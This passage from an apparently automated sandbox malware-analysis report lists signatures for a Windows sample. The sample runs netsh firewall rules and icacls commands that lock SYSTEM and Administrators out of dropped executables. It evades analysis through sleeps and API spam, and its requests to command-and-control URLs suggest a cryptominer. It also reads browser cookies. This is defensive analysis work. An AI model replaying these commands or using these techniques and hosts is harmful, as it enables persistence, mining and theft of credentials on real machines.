- "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=156.67.216.61",
- "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=156.67.216.61",
- "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=165.22.23.102",
- "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=165.22.23.102",
- "netsh advfirewall firewall add rule name=\"HTTP31\" protocol=TCP action=block dir=IN remoteip=178.128.74.151",
- "netsh advfirewall firewall add rule name=\"HTTP32\" protocol=TCP action=block dir=out remoteip=178.128.74.151",
- "icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)",
- "icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny system:(OI)(CI)(F)",
- "icacls \"\"C:\\WINDOWS\\inf\\lsmm.exe\" /deny Administrators:(OI)(CI)(F)",
- "icacls \"\"C:\\WINDOWS\\inf\\msief.exe\" /deny \\xd0\\x90\\xd0\\xb4\\xd0\\xbc\\xd0\\xb8\\xd0\\xbd\\xd0\\xb8\\xd1\\x81\\xd1\\x82\\xd1\\x80\\xd0\\xb0\\xd1\\x82\\xd0\\xbe\\xd1\\x80\\xd1\\x8b:(OI)(CI)(F)"
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
- "Details":
- "IP": "194.0.200.251:465"
- "IP": "151.139.128.14:80"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "rutserv.exe, PID 2716"
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details":
- "Window": "WSH-Timer"
- "Description": "Loads a driver",
- "Details":
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\AppID"
- "Description": "Starts servers listening on 0.0.0.0:5650, :0",
- "Details":
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "rutserv.exe"
- "process": "schtasks.exe"
- "process": "spoolsv.exe"
- "process": "services.exe"
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details":
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00000007, length: 0x001ffff0"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x00049a00, length: 0x0043cb5e"
- "self_read": "process: wini.exe, pid: 2872, offset: 0x0048680e, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 2400, offset: 0x00018640, length: 0x00000012"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00000007, length: 0x001ffff0"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x00049a00, length: 0x003d5e6e"
- "self_read": "process: cheat.exe, pid: 2808, offset: 0x0041f97e, length: 0x00000020"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00000007, length: 0x000dddb7"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00042200, length: 0x00000037"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00042214, length: 0x000000d1"
- "self_read": "process: R8.exe, pid: 1560, offset: 0x00042237, length: 0x0009bb87"
- "self_read": "process: rutserv.exe, pid: 2716, offset: 0x00000000, length: 0x001b4e00"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 2444, offset: 0x00018640, length: 0x00000012"
- "self_read": "process: rutserv.exe, pid: 2008, offset: 0x00000000, length: 0x001b4e00"
- "self_read": "process: rutserv.exe, pid: 3236, offset: 0x00000000, length: 0x001b4e00"
- "self_read": "process: rutserv.exe, pid: 3784, offset: 0x00000000, length: 0x001b4e00"
- "self_read": "process: rfusclient.exe, pid: 2896, offset: 0x00000000, length: 0x00179400"
- "self_read": "process: rfusclient.exe, pid: 4788, offset: 0x00000000, length: 0x00179400"
- "self_read": "process: rfusclient.exe, pid: 2324, offset: 0x00000000, length: 0x00179400"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00000007, length: 0x000ffff0"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00034e00, length: 0x00000037"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00034e14, length: 0x0033d193"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00372707, length: 0x0000004d"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00372bb4, length: 0x00000056"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037333a, length: 0x00000050"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037374a, length: 0x00000059"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00373b03, length: 0x0000004e"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00373f71, length: 0x00000057"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00374328, length: 0x0000004c"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00374824, length: 0x00000055"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00374c49, length: 0x0000004e"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00375417, length: 0x00000057"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00375c2e, length: 0x00000052"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00376090, length: 0x0000005b"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037647b, length: 0x00000051"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00376adc, length: 0x0000005a"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003772f6, length: 0x0000004b"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003777c1, length: 0x00000054"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00377bd5, length: 0x0000004d"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00378082, length: 0x00000056"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00378468, length: 0x00000054"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037912c, length: 0x0000004b"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00379ae7, length: 0x00000050"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037a487, length: 0x00000059"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037a940, length: 0x00000057"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037d0d7, length: 0x0000004e"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037da75, length: 0x0000004e"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037df63, length: 0x00000057"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037e39a, length: 0x0000004e"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037eb78, length: 0x00000057"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037efcf, length: 0x0000004c"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037f81b, length: 0x00000055"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0037fc80, length: 0x0000004d"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003804dd, length: 0x00000056"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00380953, length: 0x0000004b"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00380efe, length: 0x00000054"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003813d2, length: 0x0000004e"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003818a0, length: 0x00000057"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00381cb7, length: 0x00000054"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0038211b, length: 0x0000005d"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003824f8, length: 0x00011456"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0039412e, length: 0x00017e37"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003acb05, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003af017, length: 0x0000a8c4"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003ba1bb, length: 0x00020556"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003de171, length: 0x00018e16"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003f9be7, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003fa339, length: 0x00000030"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003faae9, length: 0x00000031"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x003fc64a, length: 0x001425b5"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00543c1f, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00546204, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00548e09, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0054b8ce, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0054e863, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005511c8, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0055384d, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00555d42, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005584b7, length: 0x00000035"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x0055b04c, length: 0x00000033"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005626bf, length: 0x00000034"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005644b3, length: 0x0002cd4d"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00593620, length: 0x00000037"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00593e17, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005947d9, length: 0x00000030"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00594f09, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00596aab, length: 0x00000030"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005970db, length: 0x0004765a"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005e2f35, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005e6fb7, length: 0x00000030"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005e8d07, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005ec3e9, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005ef10b, length: 0x00000030"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f1acb, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f211d, length: 0x00000030"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f26ad, length: 0x0000002f"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f5d5c, length: 0x00088810"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00683b6c, length: 0x0000a3e8"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00693104, length: 0x00000032"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x00696006, length: 0x00018f21"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x006b6207, length: 0x0000003c"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x006b6303, length: 0x00000036"
- "self_read": "process: scaner.exe, pid: 6000, offset: 0x006b6389, length: 0x0000002d"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "taskhostw.exe -> C:\\Windows\\System32\\cmd.exe"
- "Process": "wscript.exe -> C:\\Programdata\\Windows\\install.bat"
- "Process": "wscript.exe -> pause.bat"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Programdata\\WindowsTask\\scaner.exe"
- "binary": "C:\\ProgramData\\Windows\\winit.exe"
- "binary": "C:\\ProgramData\\install\\taskhostw.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://ih1667924.myihor.ru/index.php"
- "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
- "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D"
- "suspicious_request": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg"
- "suspicious_request": "http://taskhostw.com/randomx/STATUS.html"
- "suspicious_request": "http://taskhostw.com/randomx/loaderTOP.html"
- "suspicious_request": "http://taskhostw.com/randomx/Login.html"
- "suspicious_request": "http://taskhostw.com/randomx/Password.html"
- "suspicious_request": "http://taskhostw.com/randomx/Server.html"
- "suspicious_request": "http://taskhostw.com/randomx/configCPUX.html"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://ip-api.com/json"
- "url": "http://ih1667924.myihor.ru/index.php"
- "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
- "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D"
- "url": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg"
- "url": "http://taskhostw.com/randomx/STATUS.html"
- "url": "http://taskhostw.com/randomx/loaderTOP.html"
- "url": "http://taskhostw.com/randomx/Login.html"
- "url": "http://taskhostw.com/randomx/Password.html"
- "url": "http://taskhostw.com/randomx/Server.html"
- "url": "http://taskhostw.com/randomx/configCPUX.html"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00a18000, virtual_size: 0x00a17f50"
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details":
- "Process": "taskkill.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
- "Process": "rutserv.exe tried to sleep 926 seconds, actually delayed analysis time by 0 seconds"
- "Process": "netsh.exe tried to sleep 3540 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 1260 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 7256816 times"
- "Spam": "rutserv.exe (3784) called API GetSystemTimeAsFileTime 65535 times"
- "Spam": "rfusclient.exe (2896) called API GetSystemTimeAsFileTime 65535 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
